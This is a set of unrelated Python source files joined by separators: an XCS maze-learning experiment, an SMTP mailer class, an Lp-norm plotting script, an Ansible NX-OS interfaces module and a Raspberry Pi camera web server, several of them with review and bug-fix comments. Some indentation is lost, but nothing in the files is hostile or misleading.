def stateToCodution(conditionChar):
    """Translate maze cell characters (bytes) into 3-bit condition codes.

    Encoding: A:001 S:010 .:100 $:101 %:110 T:011 N:000; every other
    character (including '1' and '#') maps to 111.

    Args:
        conditionChar: iterable of single-character bytes objects.

    Returns:
        List of 3-character bit strings, one per input cell.
    """
    encoding = {
        'A': '001',
        'S': '010',
        '.': '100',
        '$': '101',
        '%': '110',
        'T': '011',
        'N': '000',
    }
    condition = list()
    for cell in conditionChar:
        condition.append(encoding.get(cell.decode(), '111'))
    return condition
"""
solve mountain car problem, car move on the right
"""
def eop(done):
    """End-of-problem predicate: the episode ends when `done` is truthy."""
    return done
"""
Calculates the reward for performing the action in the given state
"""
# def reward(state, action):
# #Extract the parts from the state
# address = state[:bits]
# data = state[bits:]
# #Check the action
# if str(action) == data[int(address, 2)]:
# return rho
# else:
# return 0
""
def initalize():
    """Return the encoded initial state of the global `env`.

    Queries env.getFirstCondition() and converts it to the 3-bit condition
    list via stateToCodution. (Name typo preserved: callers use `initalize`.)

    Change vs. original: removed the unused local `done = False`.
    """
    firstCondition = env.getFirstCondition()
    state = stateToCodution(firstCondition)
    return state
""
def reward(state, action):
    """Step the global `env` with `action` and return (reward, obs, condition).

    Also records the episode-termination flag in the shared `interm` dict so
    eop() callers can observe it. `state` is accepted for interface
    compatibility but unused — the live env holds the real state.
    """
    obs_next, step_reward, done, info, condition = env.step(action)
    # BUG FIX: `interm` is a dict (interm = {'done': False}), so the original
    # `interm.done = done` raised AttributeError on every call; use item
    # assignment instead.
    interm['done'] = done
    return step_reward, obs_next, condition
def trainingTestingWeight_separate(weight):
    """Train the global `my_xcs` classifier on `weight`, then run validation.

    Runs `learning_problems` training episodes, dumps the state/action table,
    then runs `validation_problems` test episodes, appending each result to
    resultList.csv via a pandas DataFrame.

    Change vs. original: the results accumulator was used before assignment
    (its init line was commented out), so the first test iteration raised
    NameError — see BUG FIX below.
    """
    # set_global_seeds(seed)
    # Training phase.
    for j in range(learning_problems):
        logger.debug("iteration:%d, learning problems: %d"%(context['iteration'], j))
        my_xcs.run_iteration_episode(j, weight)
    # Dump the learned state -> action mapping for the primary weight.
    my_xcs.stateAction(weight[0])
    # Testing phase.
    this_correct = 0
    # BUG FIX: this list was commented out in the original, so the append
    # below hit an undefined name on the first iteration.
    results = []
    for j in range(validation_problems):
        print("start to test")
        print(j)
        resultList = my_xcs.run_testing_episode(weight, j)
        results.append(resultList)
        dataframe = pd.DataFrame({'validation problem': j, 'result': resultList})
        print("dataframe")
        print(dataframe)
        # Save the DataFrame as csv; `index` controls whether row labels are
        # written (default=True).
        filename = "resultList.csv"
        dataframe.to_csv(filename, index=True, sep=',')
    #print("Performance1 " + ": " + str((this_correct / validation_problems / rho) * 100) + "%");
# Backup values for a larger maze configuration:
# currx_training=14
# currx_testing=4
# non_markov_block_training=18
# non_markov_block_testing=3
# Curriculum / maze-size parameters passed to make() below; training and
# testing currently use the same configuration.
currx_training=5
currx_testing=5
non_markov_block_training=4
non_markov_block_testing=4
def trainingTestingWeight(Allweight,ideaPoint, neighboursize, iteration, TestingInterval):
    """Run one MOEA/D-style training pass and periodically test all weights.

    Args:
        Allweight: list of objective-weight vectors trained/tested together.
        ideaPoint: ideal point for the decomposition (e.g. [1000, 1000]).
        neighboursize: neighbourhood size for weight-vector updates.
        iteration: outer experiment index; embedded in the output filename.
        TestingInterval: run a full testing round every this-many
            learning problems.

    Side effects:
        Rebuilds the (local) ``env`` for training/testing configurations,
        mutates the global learner ``my_xcs``, and appends each testing
        round's results to ``result_interation_<iteration>.csv`` (sic --
        the filename typo is load-bearing for downstream scripts; do not
        change without checking consumers).

    NOTE(review): ``env`` reassigned here is a local name; the learner
    was constructed with the module-level ``env`` -- confirm the learner
    picks up the testing environment as intended.
    """
    #training
    my_xcs.emptyPopulation()
    setup_utils.setup_and_load(environment=env_seed)
    env = make('standard', num_envs=num_envs, curr_x=currx_training, non_markov_block=non_markov_block_training)
    env._max_episode_steps = 1000
    nenvs = Config.NUM_ENVS
    total_timesteps = int(256e6)
    # Accumulates results across all testing rounds of this call.
    df = pd.DataFrame(columns=['currentweight', 'result', 'stays', 'validationproblem','inteval', 'reward'])
    for j in range(learning_problems):
        setup_utils.setup_and_load(environment=env_seed)
        logger.debug("iteration:%i, learning problems: %d"%(context['iteration'], j))
        #env1=--run-id myrun --num-levels 1 --set-seed 1
        my_xcs.run_iteration_episode(j, Allweight,ideaPoint, neighboursize)
        print("testing j:", j)
        # output
        # print("output population")
        # #todo:print later
        # #for weight in Allweight:
        # print(len(my_xcs.population))
        # Every TestingInterval problems (skipping the first two), switch
        # to the testing environment and evaluate every weight vector.
        if j>1 and (j+1)%TestingInterval==0:
            print("testing: ",j)
            # my_xcs.print_population()
            # Testing
            setup_utils.setup_and_load(environment='1')
            nenvs = Config.NUM_ENVS
            env = make('standard', num_envs=num_envs, curr_x=currx_testing,non_markov_block=non_markov_block_testing)
            env._max_episode_steps = 1000
            # Per-round result accumulators (one entry per weight x problem).
            resultAllweight=[]
            validationproblem=[]
            currentweight=[]
            stays=[]
            inteval=[]
            rewList=[]
            for i in range(validation_problems):
                # rand_state = getstate()
                # this_correct = this_correct + reward(rand_state, my_xcs.classify(rand_state))
                logger.debug("iteration:%d, learning problems: %d"%(context['iteration'], j))
                for weight in Allweight:
                    # if j<1:
                    #     actionList=my_xcs.run_testing_episode(weight, j)
                    #     dataframe = pd.DataFrame({'actionList': actionList})
                    #
                    #     filename = "iteration_%d_actionList_%s.csv"%(context['iteration'], str(weight))
                    #     dataframe.to_csv(filename, index=False, sep=',')
                    # else:
                    #     my_xcs.run_testing_episode(weight, j)
                    # env2=--run-id myrun --num-levels 1 --set-seed 5
                    resultList, stay, rew = my_xcs.run_testing_episode(weight, i, iteration)
                    resultAllweight.append(resultList)
                    validationproblem.append(i)
                    currentweight.append(weight)
                    stays.append(stay)
                    inteval.append(j)
                    rewList.append(rew)
                    # df=df.append(pd.DataFrame({'currentweight': weight, 'result': resultList,'stays':stay,'validationproblem':i,'inteval':inteval}),ignore_index=True)
            # NOTE(review): 'validationproblem' and 'inteval' store the final
            # scalar i/j (pandas broadcasts them) even though per-entry lists
            # were collected above -- confirm whether that is intentional.
            dataframe = pd.DataFrame({'currentweight': currentweight, 'result': resultAllweight,'stays':stays,'validationproblem':i,'inteval':j,'reward':rewList})
            df=df.append(dataframe, ignore_index=True)
            filename = "result_" + "interation_" +str(iteration) + ".csv"
            df.to_csv(filename, index=False, sep=',')
            # return dataframe
    #logger.debug("iteration:%d, Performance1: %s%"%(context['iteration'], str((this_correct / validation_problems / rho) * 100) ))
# --- Module-level setup: build the training environment and the learner ---
setup_utils.setup_and_load(environment =env_seed)
# set_global_seeds(seed)
env = make('standard', num_envs=num_envs, curr_x=currx_training, non_markov_block=non_markov_block_training)
env._max_episode_steps = 1000
nenvs = Config.NUM_ENVS
total_timesteps = int(256e6)
# save_interval = args.save_interval
# Set some parameters
parameters = moxcs.parameter()
# parameters.state_length = 10
parameters.state_length = 24
parameters.num_actions =7
parameters.p_hash = 0.01
parameters.theta_mna = 7
parameters.e0 = 1000 * 0.01
parameters.theta_ga = 800000
parameters.gamma = 0.99
# parameters.gamma = 0.99
parameters.N = 8000000
parameters.beta = 0.1
parameters.initial_error0 = 0.01
parameters.initial_fitness0 = 0.01
parameters.initial_prediction0 = 0.0
parameters.initial_error1 = 0.01
parameters.initial_fitness1 = 0.01
parameters.initial_prediction1 = 0.0
#todo: new parameters
# NOTE(review): state_length and num_actions are assigned twice with the
# same values; the pair below is redundant -- confirm before removing.
parameters.state_length = 24  # The number of bits in the state
parameters.num_actions=7
parameters.bitRange = 3
parameters.bits = 24
# Construct an XCS instance, wiring in the coding/reward/end-of-problem
# callbacks defined above.
context = {'iteration': 1, 'logger': logger}
my_xcs = moxcs.moxcs(parameters, stateToCodution, reward, eop, initalize, context, env)
md = moeadMethod(2, 3, (-10, -10))
# NOTE(review): the original comment said "2 obj, 11weights" but
# initailize is called with (2, 3) -- confirm the intended weight count.
Allweights = md.initailize(2, 3)
# reAllweights=list(reversed(Allweights))
weights = [[[1, 0]], [[0, 1]]]
def main():
    """Run 30 independent experiment iterations.

    Each iteration seeds the classifier population for the first weight
    vector, then trains and periodically tests with two fixed weights.

    NOTE(review): ``interval`` and ``maze2`` are not defined in this
    chunk -- confirm they exist at module level; ``positions`` is
    currently unused after assignment.
    """
    positions = maze2
    print("aaaaaaaaaaa")
    # result=[]
    for iteration in range(0,30):
        # context['iteration'] = iteration
        #todo:population is wrong with paraters.state_length
        #population = my_xcs.generate_population([[1, 0]],positions)
        # Seed the population with every possible hashed classifier for
        # the first weight vector.  (Original inline comment, translated:
        # arguments are weights, number of bits, per-bit value range.)
        population = my_xcs.allHashClassifier([[1, 0]])
        # print("population")
        trainingTestingWeight([[1,0],[0,1]], [1000, 1000], 1, iteration,interval)
    # with open('resultlist', 'w', newline='') as myfile:
    #     wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
    #     wr.writerow(result)


if __name__ == '__main__':
    main()
|
# Repository: invenia/mailer
"""
The Mailer class provides a simple way to send emails.
"""
from __future__ import absolute_import
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import os
from smtplib import SMTP
import six
_ENCODING = 'utf-8'
class Mailer(object):
    """Minimal SMTP mail sender.

    Holds credentials and a host string, opens a STARTTLS-secured,
    authenticated SMTP session on demand, and sends messages built by
    :func:`build_message_string`.  Usable as a context manager so the
    connection is always closed.
    """

    def __init__(self, username, password, host='smtp.gmail.com:587'):
        self._username = username
        self._password = password
        self._host = host
        self._server = None  # live SMTP session, or None when closed

    def open(self):
        """Connect to the SMTP host, upgrade to TLS and authenticate."""
        self._server = SMTP(self._host)
        self._server.starttls()
        self._server.login(self._username, self._password)

    def close(self):
        """Tear down the SMTP session."""
        self._server.close()
        self._server = None

    def is_open(self):
        """Return True when an SMTP session is currently held."""
        return self._server is not None

    def __enter__(self):
        self.open()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        if self.is_open():
            self.close()

    # I'm fine with the number of arguments
    # pylint: disable-msg=R0913
    def send(self, recipients, subject, body, mail_as=None, cc_recipients=None,
             bcc_recipients=None, attachments=None):
        """Send an email message.

        recipients:     an email address, or a list of addresses, of the
                        direct recipients.
        subject:        the message header.
        body:           the message body.
        mail_as:        alias to send as; defaults to the login username.
        cc_recipients:  address or list of addresses to Carbon Copy.
        bcc_recipients: address or list of addresses to Blind Carbon Copy.
        attachments:    filepath or list of filepaths to attach.
        """
        def as_list(value):
            # Normalise None / single string / list into a list.
            if value is None:
                return []
            if isinstance(value, six.string_types):
                return [value]
            return value

        if isinstance(recipients, six.string_types):
            recipients = [recipients]
        if mail_as is None:
            mail_as = self._username
        cc_recipients = as_list(cc_recipients)
        bcc_recipients = as_list(bcc_recipients)
        attachments = as_list(attachments)

        message = build_message_string(recipients, subject, body, mail_as,
                                       cc_recipients, bcc_recipients,
                                       attachments)
        # The SMTP envelope carries every recipient, including Bcc.
        self._server.sendmail(mail_as,
                              recipients + cc_recipients + bcc_recipients,
                              message)
    # pylint: enable-msg=R0913
# pylint: enable-msg=R0913
# pylint: disable-msg=R0913
def build_message_string(recipients, subject, body, sender, cc_recipients=None,
                         bcc_recipients=None, attachments=None):
    """
    Build an email message and return it serialised as a string.

    NOTE: It's recommended that you use the Mailer object to accomplish
    this. Besides handling (interfacing) smtp, it also allows fuller
    defaults.

    recipients:     a list of email addresses of the direct recipients.
    subject:        the header of the message.
    body:           the message body.
    sender:         the address the message is sent as.
    cc_recipients:  a list of addresses to Carbon Copy. Default: None
    bcc_recipients: accepted for interface compatibility, but
                    deliberately NOT written into the headers (see
                    below). Default: None
    attachments:    a list of filepaths of files to attach. Default: None

    Fixes:
    - The subject was encoded to bytes before being set as a header,
      which corrupts the message on Python 3; headers must be text and
      the email package performs any encoding itself.
    - The original added a 'Bcc' header, revealing the blind-carbon-copy
      recipients to everyone. Bcc delivery belongs in the SMTP envelope
      (Mailer.send already passes bcc addresses to sendmail).
    - Attachment files are now closed deterministically.
    """
    message = MIMEText(body.encode(_ENCODING), _charset=_ENCODING)

    if attachments:
        full_message = MIMEMultipart()
        full_message.attach(message)
        message = full_message

        for attachment in attachments:
            with open(attachment, 'rb') as attachment_file:
                application = MIMEApplication(attachment_file.read())
            application.add_header('Content-Disposition', 'attachment',
                                   filename=os.path.basename(attachment))
            message.attach(application)

    message['Subject'] = subject
    message['From'] = sender
    message['To'] = _format_addresses(recipients)

    if cc_recipients:
        message['Cc'] = _format_addresses(cc_recipients)
    # Intentionally no 'Bcc' header: bcc_recipients stay invisible.

    return message.as_string()
# pylint: enable-msg=R0913
def _format_addresses(addresses):
"""
build an address string from a list of addresses
"""
return ', '.join(addresses).encode(_ENCODING)
|
# File: Code_Python/ch3_1_4_norm.py
### ch3.1.4 Plotting the Lp norm
#%%
# Libraries used in section 3.1.4
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation

#%%
## Plot the Lp norm

# Choose the value of p
p = 1

# Range of w values
w_vals = np.arange(-10.0, 10.1, 0.1)

# 2D mesh of (w1, w2) points for plotting
W1, W2 = np.meshgrid(w_vals, w_vals)

# Lp norm over the grid
Lp = (np.abs(W1)**p + np.abs(W2)**p)**(1.0 / p)

#%%
# 3D surface plot of the Lp norm
fig = plt.figure(figsize=(8, 8))
ax = fig.add_subplot(projection='3d')  # enable 3D axes
ax.plot_surface(W1, W2, Lp, cmap='jet')  # surface
ax.contour(W1, W2, Lp, cmap='jet', offset=0)  # contours at the base
ax.set_xlabel('$w_1$')
ax.set_ylabel('$w_2$')
ax.set_zlabel('$||w||_p$')
ax.set_title('p=' + str(np.round(p, 1)), loc='left')
# Fix: raw string.  The original non-raw literal relied on '\s' being an
# *invalid* escape (preserved verbatim), which raises SyntaxWarning on
# modern Python; the rendered text is byte-identical.
fig.suptitle(r'$||w||_p = {}^p\sqrt{\sum_{j=1}^M |w_j|^p}$')
#ax.view_init(elev=90, azim=270)  # viewing angle
plt.show()

#%%
# 2D contour plot of the Lp norm
plt.figure(figsize=(9, 8))
plt.contour(W1, W2, Lp, cmap='jet')  # contour plot
#plt.contour(W1, W2, Lp, cmap='jet', levels=1)  # contours at given levels
#plt.contourf(W1, W2, Lp, cmap='jet')  # filled contours
plt.xlabel('$w_1$')
plt.ylabel('$w_2$')
plt.title('p=' + str(np.round(p, 1)), loc='left')
plt.suptitle(r'$||w||_p = {}^p\sqrt{\sum_{j=1}^M |w_j|^p}$')  # raw string fix, as above
plt.colorbar(label='$||w||_p$')
plt.grid()
plt.gca().set_aspect('equal')
plt.show()

#%%
## Plot the regularisation term

# Regularisation term E_W(w) = (1/p) * sum_j |w_j|^p
E_W = (np.abs(W1)**p + np.abs(W2)**p) / p

# 3D surface plot of the regularisation term
fig = plt.figure(figsize=(8, 8))
ax = fig.add_subplot(projection='3d')  # enable 3D axes
ax.plot_surface(W1, W2, E_W, cmap='jet')  # surface
ax.contour(W1, W2, E_W, cmap='jet', offset=0)  # contours at the base
ax.set_xlabel('$w_1$')
ax.set_ylabel('$w_2$')
ax.set_zlabel('$E_W(w)$')
ax.set_title('p=' + str(np.round(p, 1)), loc='left')
fig.suptitle(r'$E_W(w) = \frac{1}{p} \sum_{j=1}^M |w_j|^p$')  # raw string fix, rendered text unchanged
#ax.view_init(elev=90, azim=270)  # viewing angle
plt.show()

#%%
## Relationship between p and the shape of the graph

# Values of p to animate over
p_vals = np.arange(0.1, 10.1, 0.1)

# Initialise the figure for the 3D animation
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(projection='3d')  # enable 3D axes
fig.suptitle('Lp-Norm', fontsize=20)
# Frame-drawing callback for the 3D FuncAnimation
def update(i):
    """Redraw the Lp-norm surface for the i-th value of p."""
    # Wipe the previous frame's axes
    plt.cla()

    # Current exponent and the corresponding norm over the grid
    p = p_vals[i]
    Lp = (np.abs(W1)**p + np.abs(W2)**p)**(1.0 / p)

    # Surface plus base contours, with labels refreshed each frame
    ax.plot_surface(W1, W2, Lp, cmap='jet')
    ax.contour(W1, W2, Lp, cmap='jet', offset=0)
    ax.set_xlabel('$w_1$')
    ax.set_ylabel('$w_2$')
    ax.set_zlabel('$||w||_p$')
    ax.set_title('p=' + str(np.round(p, 1)), loc='left')
# Build the gif: one frame per value of p, 100 ms apart
anime_norm3d = FuncAnimation(fig, update, frames=len(p_vals), interval=100)

# Save the gif (path must exist)
anime_norm3d.save('PRML/Fig/ch3_1_4_LpNorm_3d.gif')

#%%
# Initialise the figure for the 2D animation
fig = plt.figure(figsize=(6, 6))

# Frame-drawing callback defined below
def update(i):
    """Redraw the 2D Lp-norm contour plot for the i-th value of p."""
    # Wipe the previous frame's axes
    plt.cla()

    # Current exponent
    p = p_vals[i]

    # Lp norm over the grid
    Lp = (np.abs(W1)**p + np.abs(W2)**p)**(1.0 / p)

    # 2D contour plot of the Lp norm
    plt.contour(W1, W2, Lp, cmap='jet')
    #plt.contourf(W1, W2, Lp, cmap='jet')  # filled contours
    plt.xlabel('$w_1$')
    plt.ylabel('$w_2$')
    plt.title('p=' + str(np.round(p, 1)), loc='left')
    plt.suptitle('Lp-Norm', fontsize=20)
    plt.grid()
    # Fix: plt.axes() creates and activates a *new* Axes on every frame
    # (and that usage is deprecated); operate on the current Axes
    # instead, matching the static 2D plot above.
    plt.gca().set_aspect('equal')
# Build the gif: one frame per value of p, 100 ms apart
anime_norm2d = FuncAnimation(fig, update, frames=len(p_vals), interval=100)

# Save the gif (path must exist)
anime_norm2d.save('PRML/Fig/ch3_1_4_LpNorm_2d.gif')
|
# File: ansible/venv/lib/python2.7/site-packages/ansible/modules/network/nxos/nxos_interfaces.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for nxos_interfaces
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Standard Ansible module metadata: this module is a tech preview
# maintained by the network team.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'network'}
DOCUMENTATION = """
---
module: nxos_interfaces
version_added: 2.9
short_description: 'Manages interface attributes of NX-OS Interfaces'
description: This module manages the interface attributes of NX-OS interfaces.
author: Trishna Guha (@trishnaguha)
notes:
- Tested against NXOS 7.3.(0)D1(1) on VIRL
options:
config:
description: A dictionary of interface options
type: list
elements: dict
suboptions:
name:
description:
- Full name of interface, e.g. Ethernet1/1, port-channel10.
type: str
required: true
description:
description:
- Interface description.
type: str
enabled:
description:
- Administrative state of the interface.
Set the value to C(true) to administratively enable the interface
or C(false) to disable it
type: bool
speed:
description:
- Interface link speed. Applicable for Ethernet interfaces only.
type: str
mode:
description:
- Manage Layer2 or Layer3 state of the interface.
Applicable for Ethernet and port channel interfaces only.
choices: ['layer2','layer3']
type: str
mtu:
description:
- MTU for a specific interface. Must be an even number between 576 and 9216.
Applicable for Ethernet interfaces only.
type: str
duplex:
description:
- Interface link status. Applicable for Ethernet interfaces only.
type: str
choices: ['full', 'half', 'auto']
ip_forward:
description:
- Enable or disable IP forward feature on SVIs.
Set the value to C(true) to enable or C(false) to disable.
type: bool
fabric_forwarding_anycast_gateway:
description:
- Associate SVI with anycast gateway under VLAN configuration mode.
Applicable for SVI interfaces only.
type: bool
state:
description:
- The state of the configuration after module completion
type: str
choices:
- merged
- replaced
- overridden
- deleted
default: merged
"""
EXAMPLES = """
# Using merged
# Before state:
# -------------
#
# interface Ethernet1/1
# description testing
# mtu 1800
- name: Merge provided configuration with device configuration
nxos_interfaces:
config:
- name: Ethernet1/1
description: 'Configured by Ansible'
enabled: True
- name: Ethernet1/2
description: 'Configured by Ansible Network'
enabled: False
state: merged
# After state:
# ------------
#
# interface Ethernet1/1
# description Configured by Ansible
# no shutdown
# mtu 1800
# interface Ethernet2
# description Configured by Ansible Network
# shutdown
# Using replaced
# Before state:
# -------------
#
# interface Ethernet1/1
# description Interface 1/1
# interface Ethernet1/2
- name: Replaces device configuration of listed interfaces with provided configuration
nxos_interfaces:
config:
- name: Ethernet1/1
description: 'Configured by Ansible'
enabled: True
mtu: 2000
- name: Ethernet1/2
description: 'Configured by Ansible Network'
enabled: False
mode: layer2
state: replaced
# After state:
# ------------
#
# interface Ethernet1/1
# description Configured by Ansible
# no shutdown
# mtu 1500
# interface Ethernet2/2
# description Configured by Ansible Network
# shutdown
# switchport
# Using overridden
# Before state:
# -------------
#
# interface Ethernet1/1
# description Interface Ethernet1/1
# interface Ethernet1/2
# interface mgmt0
# description Management interface
# ip address dhcp
- name: Override device configuration of all interfaces with provided configuration
nxos_interfaces:
config:
- name: Ethernet1/1
enabled: True
- name: Ethernet1/2
description: 'Configured by Ansible Network'
enabled: False
state: overridden
# After state:
# ------------
#
# interface Ethernet1/1
# interface Ethernet1/2
# description Configured by Ansible Network
# shutdown
# interface mgmt0
# ip address dhcp
# Using deleted
# Before state:
# -------------
#
# interface Ethernet1/1
# description Interface Ethernet1/1
# interface Ethernet1/2
# interface mgmt0
# description Management interface
# ip address dhcp
- name: Delete or return interface parameters to default settings
nxos_interfaces:
config:
- name: Ethernet1/1
state: deleted
# After state:
# ------------
#
# interface Ethernet1/1
# interface Ethernet1/2
# interface mgmt0
# description Management interface
# ip address dhcp
"""
RETURN = """
before:
description: The configuration as structured data prior to module invocation.
returned: always
type: list
sample: >
The configuration returned will always be in the same format
of the parameters above.
after:
description: The configuration as structured data after module completion.
returned: when changed
type: list
sample: >
The configuration returned will always be in the same format
of the parameters above.
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample: ['interface Ethernet1/1', 'mtu 1800']
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.nxos.argspec.interfaces.interfaces import InterfacesArgs
from ansible.module_utils.network.nxos.config.interfaces.interfaces import Interfaces
def main():
    """
    Main entry point for module execution.

    :returns: nothing; exits the Ansible module with the execution result
    """
    module = AnsibleModule(
        argument_spec=InterfacesArgs.argument_spec,
        supports_check_mode=True,
    )
    module.exit_json(**Interfaces(module).execute_module())


if __name__ == '__main__':
    main()
|
# File: server/rpi_cam/server.py
from aiohttp import web
from aiohttp_index import IndexMiddleware
import logging
import socketio
from rpi_cam.tools import get_logger, CLIENT_BUILD_DIR, CAM_DATA_DIR
from rpi_cam.capture import get_frame_manager, Drivers
from rpi_cam.capture.frame_manager import ImageError, DEFAULT_PREVIEW_RESOLUTION
from rpi_cam.capture.rpi_capture.picamera_options import DEFAULT_PREVIEW_SENSOR_MODE
class RPiCameraServer(object):
    """aiohttp + socket.io server exposing a Raspberry Pi camera.

    Serves the client build and captured images over HTTP, and pushes
    previews, FPS figures and status reports to socket.io clients on
    the '/cam' namespace.  Background tasks handle preview streaming,
    auto-shooting, reporting and camera lifecycle.

    Fixes relative to the original:
    - ``await self.logger.error(e)`` awaited a plain logging call
      (``await None`` raises TypeError, masking the real error) -- the
      ``await`` is removed in both places.
    - Three log messages had lost their ``{filename}`` placeholder
      (mangled to "(unknown)" with a dead ``.format(filename=...)``) --
      the placeholders are restored.
    - The settings handler now also catches KeyError for payloads with
      missing keys, matching its "log and continue" intent.
    """

    def __init__(self, driver=Drivers.RPI, frame_rate=24,
                 cam_data_dir=CAM_DATA_DIR, client_build_dir=CLIENT_BUILD_DIR,
                 log_level=logging.INFO,
                 shoot_at_startup=False,
                 preview_sensor_mode=DEFAULT_PREVIEW_SENSOR_MODE,
                 preview_resolution=DEFAULT_PREVIEW_RESOLUTION,
                 **web_app_args):
        self.sio = socketio.AsyncServer()
        self.logger = get_logger('rpi_cam.server', level=log_level, sio=self.sio, namespace='/cam')

        self.app = web.Application(middlewares=[IndexMiddleware()])
        self.sio.attach(self.app)

        # Client-tunable runtime settings (see the 'update settings' event).
        self.frame_rate = frame_rate
        self.default_auto_shoot = False
        self.auto_shoot = False
        self.shoot_timeout = 5            # seconds between automatic shots
        self.clients = 0                  # number of connected clients
        self.idle_when_alone = True       # stop camera when nobody watches
        self.report_timeout = 30          # seconds between status reports
        self.camera_idle_timeout = 5      # grace period before camera stop
        self.camera_stop_task = None      # pending postponed-stop task
        self.shoot_at_startup = shoot_at_startup
        self.startup_shooting_timeout = 300
        self.latest_preview = None        # most recent preview descriptor

        self.frame_manager = get_frame_manager(
            driver, cam_data_dir,
            url_prefix='/cam_data',
            logger=get_logger('rpi_cam.capture.frame_manager', level=log_level,
                              sio=self.sio, namespace='/cam'),
            preview_sensor_mode=preview_sensor_mode,
            preview_resolution=preview_resolution,
        )

        self.web_app_args = web_app_args

        # HTTP routes: captured data, latest-preview endpoint, client build.
        self.app.router.add_static('/cam_data', cam_data_dir, show_index=True)
        self.app.router.add_get('/latest', self.get_latest_preview)
        self.app.router.add_static('/', client_build_dir)

        self.logger.warning('Starting background tasks.')
        self.sio.start_background_task(self.stream_thumbs)
        self.sio.start_background_task(self.auto_shoot_task)
        self.sio.start_background_task(self.send_fps_updates)
        self.sio.start_background_task(self.send_status_reports)
        self.startup_shooting_task = self.sio.start_background_task(self.startup_shooting)

        self._define_events()

    def run(self):
        """Run the aiohttp app (blocking); stop the camera on shutdown."""
        self.logger.warning('Starting server with parameter set: {kwargs}.'.format(kwargs=self.web_app_args))
        web.run_app(self.app, **self.web_app_args)

        if self.frame_manager.is_started:
            self.frame_manager.stop()

    def _define_events(self):
        """Register socket.io event handlers on the '/cam' namespace."""

        @self.sio.on('update settings', namespace='/cam')
        async def message(sid, data):
            self.logger.warning('Updating camera settings to {settings}'.format(settings=data))
            try:
                self.frame_rate = int(data['frameRate'])
                self.auto_shoot = bool(data['autoShoot'])
                self.shoot_timeout = int(data['shootTimeout'])
                self.idle_when_alone = bool(data['idleWhenAlone'])
                self.report_timeout = int(data['reportTimeout'])
                self.camera_idle_timeout = int(data['cameraIdleTimeout'])
            except (KeyError, ValueError):
                # Malformed payload: log and keep whatever was applied.
                self.logger.error('Error updating camera settings to {settings}'.format(settings=data))
            # Echo the effective settings back to the caller.
            await self.send_camera_settings(sid)

        @self.sio.on('shoot', namespace='/cam')
        async def message(sid):
            await self.shoot(sid)

        @self.sio.on('connect', namespace='/cam')
        async def connect(sid, environ):
            self.logger.warning('Connection established: {sid} from {origin}.'.format(
                sid=sid, origin=environ.get('HTTP_ORIGIN', 'unknown origin')
            ))
            if not self.frame_manager.is_started:
                self.logger.warning('Starting camera...')
                self.frame_manager.start()

            self.clients += 1

            # A new client cancels any pending camera shutdown...
            if self.camera_stop_task is not None:
                self.logger.info('Cancelling postponed camera stop.')
                self.camera_stop_task.cancel()
                self.camera_stop_task = None

            # ...and ends the startup time lapse, if one is running.
            if self.startup_shooting_task is not None:
                self.logger.info('Cancelling startup time lapse.')
                self.startup_shooting_task.cancel()
                self.startup_shooting_task = None
                self.auto_shoot = self.default_auto_shoot

            await self.send_camera_settings(sid)

            self.logger.info('Initialising user with latest images.')
            await self.send_latest_images_update(sid)
            await self.send_status_report()

        @self.sio.on('disconnect', namespace='/cam')
        def disconnect(sid):
            self.logger.warning('Disconnected: %s' % sid)
            self.clients -= 1

            if self.clients < 1 and self.frame_manager.is_started:
                self.logger.warning('No more clients.')
                if self.idle_when_alone:
                    self.stop_camera()

    async def get_latest_preview(self, request):
        """HTTP handler: return the latest preview descriptor as JSON."""
        if self.latest_preview is None:
            await self.make_preview()
        return web.json_response(self.latest_preview.__dict__)

    def stop_camera(self):
        """Stop the camera, either after a grace period or immediately."""
        if self.camera_idle_timeout > 0:
            self.logger.warning('Closing camera...')
            self.camera_stop_task = self.sio.start_background_task(self.postponed_camera_stop)
        else:
            self.logger.warning('Stop camera immediately...')
            self.frame_manager.stop()

    async def close_all_connections(self):
        """Force-close every open socket.io connection."""
        for sock in self.sio.eio.sockets.values():
            await sock.close()

    async def send_camera_settings(self, sid=None):
        """Emit the current settings to one client (or broadcast)."""
        camera_settings = {
            'frameRate': self.frame_rate,
            'autoShoot': int(self.auto_shoot),
            'shootTimeout': self.shoot_timeout,
            'idleWhenAlone': int(self.idle_when_alone),
            'reportTimeout': int(self.report_timeout),
            'cameraIdleTimeout': int(self.camera_idle_timeout),
        }
        self.logger.info('Update user(s) with camera settings.')
        await self.sio.emit('settings',
                            camera_settings,
                            sid=sid,
                            namespace='/cam')

    async def send_latest_images_update(self, sid=None):
        """Emit the list of most recent captured images."""
        try:
            await self.sio.emit('latest images',
                                [img.__dict__ for img in self.frame_manager.get_latest_images()],
                                sid=sid,
                                namespace='/cam')
        except ImageError as e:
            # Fix: logger.error is synchronous -- do not await it.
            self.logger.error(e)

    async def send_status_report(self):
        """Log the frame manager's current state report, if any."""
        report = self.frame_manager.report_state()

        # We do not send empty reports
        if len(report) < 1:
            return

        if report['is_critical']:
            self.logger.error(report['data'])
        else:
            self.logger.info(report['data'])

    async def shoot(self, sid=None):
        """Capture a full-resolution image and notify clients."""
        if not self.frame_manager.is_started:
            self.logger.error('Trying to shoot from idle frame manager.')
            return

        try:
            img = self.frame_manager.shoot()
            if sid is not None and img is not None:
                # Fix: restore the lost {filename} placeholder.
                self.logger.debug('Sending update for recently shot image of {filename}'.format(filename=img.filename))
                await self.sio.emit('image', img.__dict__, room=sid, namespace='/cam')

            self.logger.debug('Sending latest images update.')
            await self.send_latest_images_update()
            self.logger.info('Successfully shot image: {filename}'.format(filename=img.filename))
        except ImageError as e:
            # Fix: logger.error is synchronous -- do not await it.
            self.logger.error(e)

